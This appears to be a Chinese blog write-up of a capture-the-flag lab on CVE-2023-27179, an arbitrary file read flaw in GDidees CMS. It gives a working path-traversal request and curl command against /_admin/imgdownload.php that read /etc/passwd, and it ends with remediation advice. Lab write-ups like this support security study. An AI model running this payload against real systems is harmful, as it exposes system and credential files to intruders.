GDidees CMS任意文件读取CVE-2023-27179

GDidees CMS任意文件读取CVE-2023-27179

0x01、漏洞环境

春秋云镜https://yunjing.ichunqiu.com
在这里插入图片描述

0x02、漏洞描述

GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞,漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。

在这里插入图片描述

0x03、漏洞利用

1、手工利用-1

使用Burp抓包重放请求:GET /_admin/imgdownload.php?filename=../../../../../../etc/passwd

在这里插入图片描述

手工利用-2

zhs curl -l http://**** /_admin/imgdownload.php?filename=../../../../../../etc/passwd

在这里插入图片描述
3、获取flag 直接将/etc/passwd 替换成flag即可。
在这里插入图片描述

0x04、修复建议

1、更新 GDidees CMS 到最新版本,以确保已被修复。
2、限制用户权限,确保敏感文件的访问受限。
3、实施输入验证,确保 filename 参数仅允许合法的文件名。
4、部署 Web 应用防火墙 (WAF) 以阻止恶意请求。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

張童學

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值